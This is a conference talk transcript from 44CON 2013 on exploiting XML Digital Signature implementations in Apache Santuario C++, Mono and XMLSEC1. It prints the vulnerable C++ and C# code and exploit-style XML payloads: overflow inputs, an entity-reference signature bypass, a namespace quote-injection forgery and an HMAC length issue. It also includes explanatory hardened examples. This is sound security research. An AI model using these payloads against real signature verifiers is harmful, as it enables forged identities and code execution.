44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw
DESCRIPTION
Many security critical systems rely on the correct implementation of the XML Digital Signature standard for the purposes of verification and identity management. Technologies such as SAML and Web Service Security use the standard, and its sibling XML Encryption, to manage their security. Being a standard, there is, unsurprisingly, no canonical implementation for any platform or language; with so many different developments there are likely to be differences in how the standard is interpreted. This presentation is about research done against the main open and closed source implementations of XML Digital Signatures, and how they can be exploited to gain remote code execution, signature verification bypass or denial of service. It will show some of the nastier vulnerabilities found during the research, including a novel attack against the built-in Java and .NET libraries which allows trivial signature spoofing, exposing any user of those implementations to accepting an invalid signature, independent of their usage.
TRANSCRIPT
Research. Response. Assurance. @CTXIS
The Forger’s Art: Exploiting XML Digital Signature Implementations
44con 2013
James Forshaw (@tiraniddo)
What am I going to talk about?
• XML Digital Signature Implementations
• Vulnerabilities and how to exploit
– Memory Corruption
– Denial of Service
– Parsing Issues
– Signature Spoofing
• Demos
Why?
• SOAP Web Service Security
• Visa 3D Secure / Verified by Visa
• SAML Assertions
• MS Office Signatures
• .NET ClickOnce/XBAP Manifests
Once upon a time, on a client site...
Implementations
Existing Attacks
• There have been numerous attacks against XML Digital Signatures
• HMAC Truncation (CVE-2009-0217)
• Signature Wrapping
• XSLT – DoS/Remote Code Execution
What are XML Digital Signatures?
XML Digital Signatures
Signing XML
[Diagram: XML Document (<good/>) → Read Bytes → Sign → Signature]
Signing XML
[Diagram: XML Document (<good/>) → S/MIME? PGP? → Signature]
Of Course Not
As the "great" Steve Ballmer might have said:
"XML Developers, XML Developers, XML Developers!"
Signing XML
[Diagram: signing pipeline]
Reference: XML Document (<good/>) → Transform → Digest (SHA1: 09381a09812f20...)
SignedInfo:
<SignedInfo>
  <CanonicalizationMethod/>
  <SignatureMethod/>
  <Reference URI="#id">
    <Transforms/>
    <DigestMethod/>
    <DigestValue>C2pG...</DigestValue>
  </Reference>
</SignedInfo>
SignedInfo → Canonicalize → Digest (SHA1: 5282abc5efefa0...) → Sign (Identity) → Build Result → Signed XML Document
Signed XML Document
<good>
  <Signature xmlns="http://www.w3.org/2000/09/xmldsig#">
    <SignedInfo>
      <CanonicalizationMethod Algorithm="http://www.w3.org/TR/2001/REC-xml-c14n-20010315"/>
      <SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
      <Reference URI="">
        <Transforms>
          <Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/>
        </Transforms>
        <DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/>
        <DigestValue>C2pG...</DigestValue>
      </Reference>
    </SignedInfo>
    <SignatureValue>K4TYp...</SignatureValue>
  </Signature>
</good>
Verification Pipeline
[Diagram: the signed document (<good/>) and its SignedInfo pass through three stages: Signature Parsing, SignedInfo Verification, Reference Verification]
Signature Parsing Bugs
CVE-2013-2156
• Affected Apache Santuario C++
• Unauthenticated
• Heap overflow in Exclusive Canonicalization prefix list
Canonicalization Prefix List
<Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#">
  <InclusiveNamespaces PrefixList="xsd ds" xmlns="http://www.w3.org/2001/10/xml-exc-c14n#"/>
</Transform>
CVE-2013-2156
bool isWhiteSpace(char c) {
  // Note: the string terminator '\0' is classed as white space
  return c == ' ' || c == '\0' || c == '\t' || c == '\r' || c == '\n';
}
void XSECC14n20010315::setExclusive(char * xmlnsList) {
  char* nsBuf = new char [strlen(xmlnsList) + 1];
  int i = 0, j = 0;
  while (xmlnsList[i] != '\0') {
    while (isWhiteSpace(xmlnsList[i]))
      ++i; // Skip white space (also steps over the terminator)
    j = 0;
    while (!isWhiteSpace(xmlnsList[i]))
      nsBuf[j++] = xmlnsList[i++]; // Copy name
    // Terminate the string
    nsBuf[j] = '\0';
    // Add to exclusive list
    m_exclNSList.push_back(strdup(nsBuf));
  }
}
Exploiting It
<Reference URI="">
  <Transforms>
    <Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#">
      <InclusiveNamespaces PrefixList="AAAA..."/>
    </Transform>
    <Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#">
      <InclusiveNamespaces PrefixList=""/>
    </Transform>
  </Transforms>
</Reference>
First Transform
[Diagram: xmlnsList holds a run of 'A' characters, which is copied into nsBuf]
Second Transform
[Diagram: xmlnsList holds ' ' followed by the terminator 0, with 'A' bytes after it in memory; nsBuf holds X X; index i advances while isWhiteSpace() == true]
Second Transform
[Diagram: i reaches an 'A' byte, where isWhiteSpace() == false; index j starts copying and nsBuf holds 'A' X]
Second Transform
[Diagram: the copy continues and the 'A' bytes run on past nsBuf]
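The CVE-2013-2156 slides above, as an added example that is not Apache Santuario code: a bounded model of how far the slide's loops run on a one-space prefix list, beside a tokenizer that never treats the terminator as white space. The names `slideBytesCopied`, `splitPrefixList` and `kRegion` are hypothetical, and the memory layout in `kRegion` is constructed.

```cpp
#include <cstddef>
#include <cstring>
#include <iostream>
#include <string>
#include <vector>

// Predicate as shown on the slide: '\0' is classified as white space.
static bool slideIsWhiteSpace(char c) {
    return c == ' ' || c == '\0' || c == '\t' || c == '\r' || c == '\n';
}

// Separator test for the hardened tokenizer. '\0' is deliberately absent:
// the terminator ends the scan and is never skipped over.
static bool isSeparator(char c) {
    return c == ' ' || c == '\t' || c == '\r' || c == '\n';
}

// Bounded model of the first pass of the slide's loops over `region`
// (the list plus whatever follows it in memory). Returns how many bytes
// the "Copy name" loop would store; nothing is written here.
std::size_t slideBytesCopied(const char* region, std::size_t regionLen) {
    if (regionLen == 0 || region[0] == '\0') return 0;  // outer loop not entered
    std::size_t i = 0, copied = 0;
    while (i < regionLen && slideIsWhiteSpace(region[i])) ++i;   // skip phase
    while (i < regionLen && !slideIsWhiteSpace(region[i])) {     // copy phase
        ++i;
        ++copied;
    }
    return copied;
}

// Hardened tokenizer: every read is bounded by `len`, and each prefix is
// stored in a std::string that owns exactly the bytes it needs.
std::vector<std::string> splitPrefixList(const char* list, std::size_t len) {
    std::vector<std::string> prefixes;
    std::size_t i = 0;
    while (i < len) {
        while (i < len && isSeparator(list[i])) ++i;
        const std::size_t start = i;
        while (i < len && !isSeparator(list[i])) ++i;
        if (i > start) prefixes.emplace_back(list + start, i - start);
    }
    return prefixes;
}

std::vector<std::string> splitPrefixList(const char* list) {
    return splitPrefixList(list, std::strlen(list));
}

// Constructed sample: a one-space list, its terminator, then 'A' bytes
// standing in for whatever follows the list on the heap.
static const char kRegion[] = {' ', '\0', 'A', 'A', 'A', 'A', '\0'};

int main() {
    const std::size_t nsBufSize = std::strlen(kRegion) + 1;  // 2 bytes
    std::cout << "slide loop would copy "
              << slideBytesCopied(kRegion, sizeof kRegion)
              << " bytes into a " << nsBufSize << "-byte buffer\n";
    std::cout << "hardened tokens from the same list: "
              << splitPrefixList(kRegion).size() << "\n";
    const std::vector<std::string> prefixes = splitPrefixList("xsd ds");
    for (std::size_t k = 0; k < prefixes.size(); ++k)
        std::cout << "prefix: " << prefixes[k] << "\n";
    return 0;
}
```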
CVE-2013-2154
• Affected Apache Santuario C++
• Unauthenticated
• Stack overflow parsing a Reference URI
• Bonus: Fix was wrong, ended up with a heap overflow instead
Reference URIs
| Reference Type | Example |
| --- | --- |
| ID Reference | <Reference URI="#xyz"> |
| Entire Document | <Reference URI=""> |
| XPointer ID | <Reference URI="#xpointer(id('xyz'))"> |
| XPointer Entire Document | <Reference URI="#xpointer(/)"> |
| External | <Reference URI="http://domain.com/file.xml"> |
<good id="xyz"></good>
CVE-2013-2154
const char* URI = getReferenceUri();
// Check for #xpointer(id('A'))
if (strncmp(URI, "#xpointer(id('", 14) == 0) {
  size_t len = strlen(&URI[14]);
  char tmp[512];
  if (len > 511)
    len = 511; // len is clamped here but not used by the copy loop below
  size_t j = 14, i = 0;
  // Extract ID value
  while (URI[j] != '\'') {
    tmp[i++] = URI[j++];
  }
  tmp[i] = '\0';
}
Exploiting It
<root>
  <Signature xmlns="http://www.w3.org/2000/09/xmldsig#">
    <SignedInfo>
      <CanonicalizationMethod/>
      <SignatureMethod/>
      <Reference URI="#xpointer(id('AAAA...')">
        <Transforms/>
        <DigestMethod/>
        <DigestValue>C2pG...</DigestValue>
      </Reference>
    </SignedInfo>
    <SignatureValue>B9OL....</SignatureValue>
  </Signature>
</root>
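The CVE-2013-2154 slides above, as an added example that is not Apache Santuario code: a bounded model of how many bytes the slide's copy loop stores for a given URI, beside a fail-closed extractor that rejects unterminated, oversized or malformed XPointer ID references. The names `slideBytesStored`, `extractXPointerId` and `kMaxIdLen` are hypothetical, and the 511-character limit is an assumption taken from the slide's `tmp[512]`.

```cpp
#include <cstddef>
#include <iostream>
#include <string>

static const std::string kPrefix = "#xpointer(id('";  // 14 characters
static const std::string kSuffix = "'))";

// Assumption: keep the 511-character ID limit implied by the slide's tmp[512].
static const std::size_t kMaxIdLen = 511;

// Bounded model of the slide's copy loop: how many bytes it would store in
// tmp for this URI, terminator included. The clamped `len` plays no part,
// exactly as on the slide. Nothing is written here.
std::size_t slideBytesStored(const std::string& uri) {
    if (uri.compare(0, kPrefix.size(), kPrefix) != 0) return 0;
    std::size_t j = kPrefix.size(), stored = 0;
    while (j < uri.size() && uri[j] != '\'') {
        ++j;
        ++stored;
    }
    return stored + 1;  // plus the terminating '\0'
}

// Fail-closed extraction: returns true and fills idOut only when the URI is
// exactly #xpointer(id('<ID>')) with 1..kMaxIdLen characters in <ID>.
bool extractXPointerId(const std::string& uri, std::string& idOut) {
    idOut.clear();
    if (uri.compare(0, kPrefix.size(), kPrefix) != 0) return false;
    const std::size_t start = kPrefix.size();
    const std::size_t quote = uri.find('\'', start);
    if (quote == std::string::npos) return false;        // unterminated ID
    const std::size_t idLen = quote - start;
    if (idLen == 0 || idLen > kMaxIdLen) return false;   // empty or too long
    if (uri.compare(quote, std::string::npos, kSuffix) != 0)
        return false;                                     // trailing junk
    idOut.assign(uri, start, idLen);                      // owns its storage
    return true;
}

int main() {
    // Constructed samples: a well-formed reference and an oversized one.
    const std::string ok = "#xpointer(id('xyz'))";
    const std::string big = kPrefix + std::string(600, 'A') + kSuffix;
    std::string id;
    std::cout << "well-formed accepted: " << extractXPointerId(ok, id)
              << " (id=" << id << ")\n";
    std::cout << "slide loop would store " << slideBytesStored(big)
              << " bytes in a 512-byte buffer\n";
    std::cout << "oversized accepted: " << extractXPointerId(big, id) << "\n";
    return 0;
}
```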
Reference Verification Bugs
XML Equivalence
• Different physical XML representations might still be equivalent
<good x="1" y="2"/> ≡ <good y="2" x="1"></good>
Naïve Verification
[Diagram: the two documents are equivalent (≡) but their raw bytes hash differently]
SHA1(<good x="1" y="2"/>) = 1cc730a1b7826...
SHA1(<good y="2" x="1"></good>) = 3826723a6d5ff15...
1cc730a1b7826... ≠ 3826723a6d5ff15...
Canonicalization (C14N)
[Diagram: <good x="1" y="2"/> ≡ <good y="2" x="1"></good>; both → Canonicalizer → <good x="1" y="2"></good> → SHA1: 9c251a80204943...]
Canonicalization (C14N)
[Diagram: XML Document 1 ≢ XML Document 2; both → Canonicalizer → Canonical XML → SHA1: XXXXXXXXXXXXXX...]
Mono C14N Vulnerability
• Affected Mono (unfixed)
• Also affected XMLSEC1 (fixed)
• Allows limited signed content modification
• Same author for both implementations
W3C Canonical XML
The Bug
<good x='"'/> → <good x="""></good>
<good xmlns='"'/> → <good xmlns="""></good>
LibXML2 requires valid URLs for namespaces, though Mono doesn't
Still, xmlns='http://["]/' works on XMLSEC1
Exploiting It
<Transaction>
  <x:Expiry xmlns:x='http://app/timestamp' time='10:00:00'/>
  <Payee>Bob</Payee>
  <Amount>$100</Amount>
</Transaction>
bool IsExpired(XmlNode trans) {
  XmlNode expiry = trans.GetElementByName("http://app/timestamp", "Expiry");
  if (expiry != null) {
    return CheckExpiry(expiry);
  }
  return false;
}
Exploiting It
<Transaction>
  <x:Expiry xmlns:x='http://app/timestamp" time="10:00:00'/>
  <Payee>Bob</Payee>
  <Amount>$100</Amount>
</Transaction>
<Transaction>
  <x:Expiry xmlns:x="http://app/timestamp" time="10:00:00"/>
  <Payee>Bob</Payee>
  <Amount>$100</Amount>
</Transaction>
NS Before = 'http://app/timestamp" time="10:00:00'
NS After = 'http://app/timestamp'
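The canonicalization flaw on the slides above, as an added example that is not Mono or XMLSEC1 code: a small serializer for the `x:Expiry` element run once with the attribute-value escaping that Canonical XML requires and once with a model of the flaw, where `"` is emitted unescaped. The names `c14nEscape`, `flawedEscape`, `canonicalize`, `docWithQuoteInNs` and `docWithTimeAttr` are hypothetical, and only unqualified attributes on a single empty element are handled.

```cpp
#include <algorithm>
#include <cstddef>
#include <iostream>
#include <string>
#include <utility>
#include <vector>

typedef std::string (*Escaper)(const std::string&);

// Canonical XML 1.0 rule for attribute and namespace values: escape
// & < " and the white-space characters tab, LF and CR.
std::string c14nEscape(const std::string& v) {
    std::string out;
    for (std::size_t k = 0; k < v.size(); ++k) {
        switch (v[k]) {
            case '&':  out += "&amp;";  break;
            case '<':  out += "&lt;";   break;
            case '"':  out += "&quot;"; break;
            case '\t': out += "&#x9;";  break;
            case '\n': out += "&#xA;";  break;
            case '\r': out += "&#xD;";  break;
            default:   out += v[k];
        }
    }
    return out;
}

// Model of the flaw on "The Bug" slide: '"' is written out unescaped.
std::string flawedEscape(const std::string& v) {
    std::string out;
    for (std::size_t k = 0; k < v.size(); ++k)
        out += (v[k] == '"') ? std::string("\"")
                             : c14nEscape(std::string(1, v[k]));
    return out;
}

struct Element {
    std::string prefix, local, nsUri;
    std::vector<std::pair<std::string, std::string> > attrs;  // name, value
};

// Serialize one empty element the way C14N does: namespace declaration
// first, attributes sorted by name, values in double quotes, explicit end tag.
std::string canonicalize(Element e, Escaper esc) {
    std::sort(e.attrs.begin(), e.attrs.end());
    const std::string qname = e.prefix + ":" + e.local;
    std::string out = "<" + qname + " xmlns:" + e.prefix + "=\"" + esc(e.nsUri) + "\"";
    for (std::size_t k = 0; k < e.attrs.size(); ++k)
        out += " " + e.attrs[k].first + "=\"" + esc(e.attrs[k].second) + "\"";
    return out + "></" + qname + ">";
}

static Element makeExpiry(const std::string& nsUri) {
    Element e;
    e.prefix = "x";
    e.local = "Expiry";
    e.nsUri = nsUri;
    return e;
}

// First document on the slide: the namespace value itself contains quotes.
Element docWithQuoteInNs() {
    return makeExpiry("http://app/timestamp\" time=\"10:00:00");
}

// Second document on the slide: plain namespace plus a time attribute.
Element docWithTimeAttr() {
    Element e = makeExpiry("http://app/timestamp");
    e.attrs.push_back(std::make_pair(std::string("time"), std::string("10:00:00")));
    return e;
}

int main() {
    std::cout << "flawed,  quote in ns: " << canonicalize(docWithQuoteInNs(), flawedEscape) << "\n";
    std::cout << "flawed,  time attr:   " << canonicalize(docWithTimeAttr(), flawedEscape) << "\n";
    std::cout << "correct, quote in ns: " << canonicalize(docWithQuoteInNs(), c14nEscape) << "\n";
    std::cout << "correct, time attr:   " << canonicalize(docWithTimeAttr(), c14nEscape) << "\n";
    return 0;
}
```

With the flawed escaping both documents serialize to the same bytes, so they share a digest; with `&quot;` escaping the two canonical forms differ.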
CVE-2013-2153
• Affected Apache Santuario C++
• Signature Bypass by Hiding References
• Uses an Interesting parsing exploit
• Almost works in Mono, but they got lucky!
CVE-2013-2153
bool DSIGSignature::verify(void) {
  // First thing to do is check the references
  bool referenceCheckResult = mp_signedInfo->verify();
  // Check the signature
  bool sigVfyResult = verifySignatureOnlyInternal();
  return sigVfyResult & referenceCheckResult;
}
// ------------------------------------------
// Verify each reference element
// ------------------------------------------
bool DSIGSignedInfo::verify() {
  return DSIGReference::verifyReferenceList(mp_referenceList);
}
bool DSIGReference::verifyReferenceList(DSIGReferenceList * lst) {
  // Run through a list of hashes and checkHash for each one
  bool res = true;
  int size = lst->getSize();
  for (int i = 0; i < size; ++i) {
    if (!lst->item(i)->checkHash()) {
      res = false;
    }
  }
  // With an empty list the loop body never runs, so this is "return true"
  return res;
}
![Page 62: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/62.jpg)
CVE-2013-2153
void DSIGSignedInfo::load(void) {
    DOMNode * child = mp_signedInfoNode->getFirstChild();
    // Load rest of SignedInfo...

    // Now look at references....
    child = child->getNextSibling();

    // Run through the rest of the elements until done
    while (child != 0 && (child->getNodeType() != DOMNode::ELEMENT_NODE))
        // Skip text and comments
        child = child->getNextSibling();

    if (child != NULL)
        // Have an element node - should be a reference, so let's load the list
        mp_referenceList = DSIGReference::loadReferenceListFromXML(mp_env, child);
}
![Page 66: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/66.jpg)
Parsed DOM Tree
ELEMENT_NODE <SignedInfo>
    ELEMENT_NODE <C14NMethod>
    ELEMENT_NODE <SignatureMethod>
    ELEMENT_NODE <Reference>
        ELEMENT_NODE <Transforms>
        ELEMENT_NODE <Digest>
DSIGSignedInfo::load()
![Page 67: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/67.jpg)
Parsed DOM Tree
ELEMENT_NODE <SignedInfo>
    ELEMENT_NODE <C14NMethod>
    ELEMENT_NODE <SignatureMethod>
    Not an ELEMENT_NODE
        ELEMENT_NODE <Reference> (Ignored)
DSIGSignedInfo::load()
![Page 69: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/69.jpg)
DOM Node Types
Ref: http://www.w3.org/TR/REC-DOM-Level-1/level-one-core.html#ID-1590626201

| Node Type | Child Types |
|---|---|
| Attribute | Text, EntityReference |
| CDATASection | None |
| Comment | None |
| Document | Element, ProcessingInstruction, Comment, DocumentType |
| Element | Element, Text, Comment, ProcessingInstruction, CDATASection, EntityReference |
| Entity | Element, ProcessingInstruction, Comment, Text, CDATASection, EntityReference |
| EntityReference | Element, ProcessingInstruction, Comment, Text, CDATASection, EntityReference |
| ProcessingInstruction | None |
![Page 72: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/72.jpg)
Entity References
<!DOCTYPE good [
  <!ENTITY ent "<b/>">
]>
<good>
  <a/>&ent;<c/>
</good>

ELEMENT_NODE <good>
    ELEMENT_NODE <a>
    ENTITY_REF_NODE &ent;
        ELEMENT_NODE <b>
    ELEMENT_NODE <c>
![Page 73: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/73.jpg)
Canonical Entity References
Ref: http://www.w3.org/TR/xml-c14n
![Page 74: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/74.jpg)
Entity References after C14N
<good>
  <a/><b/><c/>
</good>

ELEMENT_NODE <good>
    ELEMENT_NODE <a>
    ELEMENT_NODE <b>
    ELEMENT_NODE <c>
![Page 75: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/75.jpg)
Exploiting It
<good>
  <Signature xmlns="http://www.w3.org/2000/09/xmldsig#">
    <SignedInfo>
      <CanonicalizationMethod/>
      <SignatureMethod/>
      <Reference URI="">
        <Transforms/>
        <DigestMethod/>
        <DigestValue>C2pG</DigestValue>
      </Reference>
    </SignedInfo>
    <SignatureValue>B9OL</SignatureValue>
  </Signature>
</good>
![Page 76: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/76.jpg)
Exploiting It
<!DOCTYPE good [
  <!ENTITY hacked "<Reference URI="">...</Reference>">
]>
<good>
  <Signature xmlns="http://www.w3.org/2000/09/xmldsig#">
    <SignedInfo>
      <CanonicalizationMethod/>
      <SignatureMethod/>
      <Reference URI="">
        <Transforms/>
        <DigestMethod/>
        <DigestValue>C2pG</DigestValue>
      </Reference>
    </SignedInfo>
    <SignatureValue>B9OL</SignatureValue>
  </Signature>
</good>
![Page 77: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/77.jpg)
Exploiting It
<!DOCTYPE good [
  <!ENTITY hacked "<Reference URI="">...</Reference>">
]>
<good>
  <Signature xmlns="http://www.w3.org/2000/09/xmldsig#">
    <SignedInfo>
      <CanonicalizationMethod/>
      <SignatureMethod/>
      &hacked;
    </SignedInfo>
    <SignatureValue>B9OL</SignatureValue>
  </Signature>
</good>
![Page 78: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/78.jpg)
Parsed DOM Tree
ELEMENT_NODE <SignedInfo>
    ELEMENT_NODE <C14NMethod>
    ELEMENT_NODE <SignatureMethod>
    ENTITY_REF_NODE &hacked;
        ELEMENT_NODE <Reference> (Ignored)
DSIGSignedInfo::load()
![Page 79: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/79.jpg)
SignedInfo Verification
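The effect of the entity reference node on reference checking, as an added example that is not code from the talk or from Apache Santuario. The toy DOM (`Node`, `makeNode`, the three sample documents) is constructed for illustration, and the fail-closed variant is an assumed policy, not the project's patch.

```cpp
#include <cstddef>
#include <iostream>
#include <string>
#include <vector>

// Toy DOM, constructed for this example (not the Xerces-C API).
enum NodeType { ELEMENT_NODE, TEXT_NODE, ENTITY_REFERENCE_NODE };

struct Node {
    NodeType type;
    std::string name;
    bool digestOk;               // <Reference> only: does DigestValue match the content?
    std::vector<Node> children;
};

static Node makeNode(NodeType type, const std::string& name, bool digestOk = true) {
    Node n;
    n.type = type;
    n.name = name;
    n.digestOk = digestOk;
    return n;
}

// Sibling walk in the spirit of DSIGSignedInfo::load(): only direct
// ELEMENT_NODE children of <SignedInfo> are ever considered.
static std::vector<const Node*> loadDirectReferences(const Node& signedInfo) {
    std::vector<const Node*> refs;
    for (std::size_t i = 0; i < signedInfo.children.size(); ++i) {
        const Node& c = signedInfo.children[i];
        if (c.type == ELEMENT_NODE && c.name == "Reference") refs.push_back(&c);
    }
    return refs;
}

// Same result logic as verifyReferenceList(): res starts true, so an empty list passes.
bool verifyReferencesPermissive(const Node& signedInfo) {
    bool res = true;
    std::vector<const Node*> refs = loadDirectReferences(signedInfo);
    for (std::size_t i = 0; i < refs.size(); ++i)
        if (!refs[i]->digestOk) res = false;
    return res;
}

// Fail-closed variant (assumed policy): reject any entity reference node under
// <SignedInfo> and require at least one Reference before checking digests.
bool verifyReferencesStrict(const Node& signedInfo) {
    for (std::size_t i = 0; i < signedInfo.children.size(); ++i)
        if (signedInfo.children[i].type == ENTITY_REFERENCE_NODE) return false;
    std::vector<const Node*> refs = loadDirectReferences(signedInfo);
    if (refs.empty()) return false;
    for (std::size_t i = 0; i < refs.size(); ++i)
        if (!refs[i]->digestOk) return false;
    return true;
}

// <SignedInfo> with the two method elements followed by one more child.
static Node signedInfoWith(const Node& third) {
    Node si = makeNode(ELEMENT_NODE, "SignedInfo");
    si.children.push_back(makeNode(ELEMENT_NODE, "CanonicalizationMethod"));
    si.children.push_back(makeNode(ELEMENT_NODE, "SignatureMethod"));
    si.children.push_back(third);
    return si;
}

// Constructed samples: untouched content, modified content with a plain
// Reference, and modified content with the Reference behind an entity reference.
Node intactDocument()   { return signedInfoWith(makeNode(ELEMENT_NODE, "Reference", true)); }
Node tamperedDocument() { return signedInfoWith(makeNode(ELEMENT_NODE, "Reference", false)); }
Node entityWrappedDocument() {
    Node ent = makeNode(ENTITY_REFERENCE_NODE, "hacked");
    ent.children.push_back(makeNode(ELEMENT_NODE, "Reference", false));
    return signedInfoWith(ent);
}

int main() {
    std::cout << std::boolalpha
              << "permissive, intact:         " << verifyReferencesPermissive(intactDocument()) << "\n"
              << "permissive, tampered:       " << verifyReferencesPermissive(tamperedDocument()) << "\n"
              << "permissive, entity-wrapped: " << verifyReferencesPermissive(entityWrappedDocument()) << "\n"
              << "strict, entity-wrapped:     " << verifyReferencesStrict(entityWrappedDocument()) << "\n";
    return 0;
}
```

The permissive check rejects the plainly tampered document but accepts the entity-wrapped one, because its reference list is empty and the result never leaves its initial `true`.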
![Page 80: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/80.jpg)
CVE-2013-2155
• Affected Apache C++ (again)
• Circumvented "fix" for HMAC Truncation (CVE-2009-0217)
• By sheer ineptitude it ended up a DoS rather than a Signature Bypass
![Page 81: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/81.jpg)
Background CVE-2009-0217
![Page 82: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/82.jpg)
HMAC Truncation
<SignedInfo>
  <CanonicalizationMethod Algorithm="http://www.w3.org/TR/2001/REC-xml-c14n-20010315"/>
  <SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#hmac-sha1">
    <HMACOutputLength>80</HMACOutputLength>
  </SignatureMethod>
  ...
</SignedInfo>

00112233445566778899AABBCCDDEEFF00112233
Truncate to 80 bits
00112233445566778899
![Page 83: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/83.jpg)
HMAC Truncation
<SignedInfo>
  <CanonicalizationMethod Algorithm="http://www.w3.org/TR/2001/REC-xml-c14n-20010315"/>
  <SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#hmac-sha1">
    <HMACOutputLength>0</HMACOutputLength>
  </SignatureMethod>
  ...
</SignedInfo>

00112233445566778899AABBCCDDEEFF00112233
Truncate to 0 bits
![Page 84: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/84.jpg)
CVE-2013-2155
while (child && strcmp(getDSIGLocalName(child), "HMACOutputLength") != 0)
    child = child->getNextSibling();

if (child) {
    // Have a max output value!
    DOMNode *textNode = child->getFirstChild();
    if (textNode) {
        m_HMACOutputLength = atoi(textNode->getNodeValue());
    }
}
So m_HMACOutputLength is an int?
![Page 88: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/88.jpg)
CVE-2013-2155
// First find the appropriate handler for the URI
XSECAlgorithmHandler* handler =
    mapURIToHandler(mp_signedInfo->getAlgorithmURI());

bool sigVfyRet = handler->verifyBase64Signature(
    m_signatureValueSB.rawCharBuffer(),
    mp_signedInfo->getHMACOutputLength(),
    mp_signingKey);
![Page 90: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/90.jpg)
CVE-2013-2155
bool verifyBase64Signature(const char * sig,
                           unsigned int outputLen,
                           const char * hash,
                           unsigned int hashLen,
                           XSECCryptoKeyType type) {
    if (type == XSECCryptoKey::KEY_HMAC) {
        // FIX: CVE-2009-0217
        if (outputLen > 0 && (outputLen < 80 || outputLen < hashLen / 2)) {
            throw XSECException("HMACOutputLength set to unsafe value.");
        }
    }

    return compareBase64StringToRaw(sig, hash, hashLen, outputLen);
}
![Page 93: 44CON 2013 - The Forger's Art: Exploiting XML Digital Signature Implementations - James Forshaw](https://reader035.vdocument.in/reader035/viewer/2022081403/554a2beeb4c90542548b4fe6/html5/thumbnails/93.jpg)
CVE-2013-2155
bool compareBase64StringToRaw(const char * b64Str,
                              unsigned char * raw,
                              unsigned int rawLen,
                              unsigned int maxCompare) {
    unsigned int maxBytes, maxBits;
    div_t d = {0};
    if (maxCompare == 0) {
        maxCompare = rawLen;
    }

    d = div(maxCompare, 8);
    maxBytes = d.quot;
    maxBits = d.rem;

    return compareBits(decode(b64Str), raw, maxBytes, maxBits);
}
bool compareBits(const unsigned char* outputStr,
                 const unsigned char* raw,
                 unsigned int maxBytes,
                 unsigned int maxBits) {
    unsigned int i, j;
    for (i = 0; i < maxBytes; ++ i) {
        if (raw[i] != outputStr[i])
            return false;
    }

    char mask = 0x01;
    for (j = 0 ; j < maxBits; ++i) {    // increments i, not j
        if ((raw[i] & mask) != (outputStr[i] & mask))
            return false;
        mask = mask << 1;
    }
    return true;
}
